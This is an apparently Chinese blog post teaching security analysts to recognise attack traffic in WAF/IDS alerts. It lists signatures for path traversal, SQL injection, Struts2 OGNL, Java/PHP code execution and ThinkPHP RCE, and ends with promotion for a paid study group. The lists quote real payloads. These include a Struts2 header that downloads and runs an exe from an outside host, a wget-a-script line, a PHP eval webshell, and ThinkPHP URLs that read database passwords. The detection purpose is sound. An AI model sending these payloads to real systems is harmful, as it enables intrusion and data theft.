威胁事件告警分析技巧及处置(一)

  • A+
所属分类:安全闲碎
威胁事件告警分析技巧及处置(一)

声明:公众号大部分文章来自团队核心成员和知识星球成员,少部分文章经过原作者授权和其它公众号白名单转载。未经授权,严禁转载,如需转载,请联系公众号管理员授权转载白名单

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者及本公众号无关!






START

0x01前言

由于近几年信息安全人员紧缺,面临HW急需安全人员的竞赛中,许多安全厂商降低招聘要求,招收大量安全工作经验较少的人员参与HW当中,由于缺乏相应的工作经验,面对攻击团队的频繁入侵,导致误判、错封攻击源IP地址,进而对公司业务造成严重影响。小编对此对攻击流特征进行了一个详细的总结,本文适用于可查看攻击数据流量的设备,如:waf、ids、ips、天眼、睿眼以及其他全流量分析系统等。

0x02期望效果


看完本文后,您能学到:
>常见告警攻击特征识别
> 低危告警攻击事件忽略
> 判告警攻击是否误报
> 复杂告警攻击Pcap取证
> 验证告警攻击是否成功

0x03通用攻击关键特征


在设备上产生的告警,就目前而言,基本都有这几个必要字段:请求头、响应码、响应头、载荷、原始数据包。通过这些字段我们可以进行事件的判,但是就我个人而言,不必执着于告警名称,如果这些字段中包含了一些通用的攻击特征,那么我可判断为是真实攻击,然后再进行下一步确定是否是自己人员进行安全测试,是否需要溯源等下一步的工作计划,通用特征包含但不限于以下这些:
/etc/passwd/etc/shadow/c:boot.ini/C:/Windows/system.ini、/windows/win.ini../../../../../ 若是只有一个且后面是图片类型 pdf类型那需结合其他事件进行综合判断cmd.exe /c[/k]、系统命令/bin/bashwget http://xx.xx.xx.xx/xx.sh CHR(68)||CHR(113)||CHR(90)||CHR(85)%print(md5(31337))执行命令的函数等。


0x04SQL注入攻击特征


常见安全漏洞对应攻击特征——SQL注入包含但不限于以下这些:
> select * from xx union select null,null> order by 10[5][2][3]> ") or ("1"="1>‘and 1=2-- -[#]、 1') AnD 1419=1419 AnD ('1419'='1420 > 1' AND ROW(4622,4623)>(SELECT COUNT(*),CONCAT('PGC2UcNo',(SELECT (CASE WHEN (4622=4622) THEN 1 ELSE 0 END)),'PGC2UcNo',FLOOR(RAND(0)*2))x FROM (SELECT 4624 UNION SELECT 4625 UNION SELECT 4626 UNION SELECT 4627)a GROUP BY x) AND 'PGC2UcNo'='PGC2UcNo> [email protected]`'` Union select userid from `%[email protected]__admin` where 1 or [email protected]`’`> 9997') AND 8553%3D8553 AND ('PVZl'%3D'PVZl,1'%3BSELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(113)||CHR(90)||CHR(85)%2C5) FROM DUAL> sleep(5)、waitfor delay '0:0:5'> and if (ascii(substr(database(),1,1))、and if (length(database()) (updatexml(1,md5(0x666F7274657374),1)))、extractvalue、NAME_CONST


威胁事件告警分析技巧及处置(一)


0x05Strusts2远程代码执行攻击特征


常见安全漏洞对应攻击特征——struts2远程代码执行包含但不限于以下这些:
> #_memberAccess=@ognl.[email protected]DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.[email protected]getResponse().getWriter(),#res.print('RTbZWnwBUdlseupNYQjf'),#res.flush(),#res.close()> /?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('SgEyRprkLcMdtnsTJCve'),%23w.flush(),%23w.close()}> class.classLoader.resources.dirContext.aliases=/eCJivkuR=conf/> Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.[email protected]DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.[email protected]class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://wiu.fxxxxxxk.me/download.exe %SystemRoot%/Temp/aodagutnzwrjrlm15341.exe & cmd.exe /c %SystemRoot%/Temp/aodagutnzwrjrlm15341.exe').(#iswin=(@java.lang.[email protected]getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{

0x06java代码执行攻击特征


常见安全漏洞对应攻击特征——Java代码执行包含但不限于以下这些:
 @ognl.OgnlContext   new java.lang.ProcessBuilder   println(  (java.lang.Runtime).getRuntime().exec(new java.lang.String、${new java.lang.Integer( import+java.util.*;import+java.io java.io.PrintWriter org.apache.commons.collections.functors.InvokerTransformer


威胁事件告警分析技巧及处置(一)


0x07PHP远程代码执行攻击特征


常见安全漏洞对应攻击特征——PHP代码执行包含但不限于以下这些:
<?php eval($_POST[xxx])?>eval()assert()preg_replace()create_function()call_user_func()array_map()call_user_func_array()phpinfo()systemexecpopenpassthrushell_execfile_put_contents


威胁事件告警分析技巧及处置(一)


0x08Thinkphp远程代码执行攻击特征


Think PHP远程代码执行漏洞包含但不限于以下这些:
index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=base64_decode&vars[1][]=MWVVdGJrc2pLZ3AyRmx1Zg=="_method": "__construct",  "filter[]": "system", "method": "get", "get[]": 'php -r "phpinfo();“’ /index.php?s=/index/\think\app/invokefunction/index.php?s=/index/\think\request/cache?s=index/\thinkRequest/input/index.php/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1?s=index/\thinkmodule/action/param1/${@phpinfo()}/index.php?s=index/thinkconfig/get&name=database.passwordindex.php?s=index/thinkconfig/get&name=database.password c=exec&f=calc.exe&_method=filter


威胁事件告警分析技巧及处置(一)






END


免费星球:要求每个人在两周内输出一篇文章发到星球里面,文章为星球成员自己整理的内容,如超过两周没有文章输出的将被拉黑一个月,超过3次将被踢出星球,永久禁止加入!

收费星球:进入的星球成员可以在里面学习一年,包括贝塔安全实验室整理好的学习资料,可让星球管理及合伙人邀请加入免费星球,可以不用发文章,加入的免费星球免踢一年!

威胁事件告警分析技巧及处置(一)

威胁事件告警分析技巧及处置(一)

威胁事件告警分析技巧及处置(一)


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: